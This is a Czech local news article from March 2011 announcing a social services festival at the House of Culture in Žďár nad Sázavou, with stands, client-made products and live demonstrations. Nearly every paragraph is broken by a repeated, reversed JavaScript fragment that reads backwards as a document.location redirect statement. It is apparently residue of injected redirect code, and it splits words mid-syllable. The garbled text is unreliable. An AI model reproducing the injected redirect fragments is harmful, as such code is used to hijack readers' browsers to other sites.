Žďár nad Sázavou, zdar nad sazavou, aktuality, sociální služby
Rainbow page separator

Sociální služby se představí veřejnosti

Čtvrtek, 31. března 2011

Žďár nad Sázavou/ Sociální služby a zařízení z celého žďárského regionu se 5. května le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku představí široké veřejnosti. V Domě kultury ve Žďáře nad Sázavou se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž bude konat od desáté hodiny ranní do šesté hodiny večerní Festival sociálních služeb. Akce má hned několik cílů. Jednak by se na ní měly vzájemně seznámit organizace a subjekty, které by pak mohly v budoucnu vzájemně spolupracovat. Důležité ale také je, aby měla veřejnost možnost poznat, jaké sociální služby jsou vůbec ve žďárském okrese nabízeny.
O každém zařízení do domovů pro seniory až po půjčovny kompenzačních pomůcek se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lidé budou moci dozvědět vše potřebné u jednotlivých stánků umístěných v kulturním domě. Tam jim také budou zástupci jednotlivých sociálních služeb odpovídat na jejich případné dotazy. Zájemci ale nebudou na festivalu jenom sbírat informace. Budou si také moci prohlédnout výrobky klientů některých prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných zařízení nebo si je dokonce i zakoupit. Lidé, kteří se chtějí navíc dozvědět, jak takové[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to předměty vlastně vznikají, k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu budou mít příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost přímo na festivalu. Tam [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž mají někteří klienti věci vyrábět přímo před očima návštěvníků akce. Organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a jeho příspěvková organizace – Sociální služby města Žďáru nad Sázavou, ještě neví, jaký bude přesný počet vystavujících na festivalu. Jelikož se akce koná až za více jak jeden měsíc, čísla se neustále mění. Jisté ale je, že se bude jednat o minimálně dvě desítky organizací, které nabízejí téměř pět desítek nejrůznějších sociálních služeb.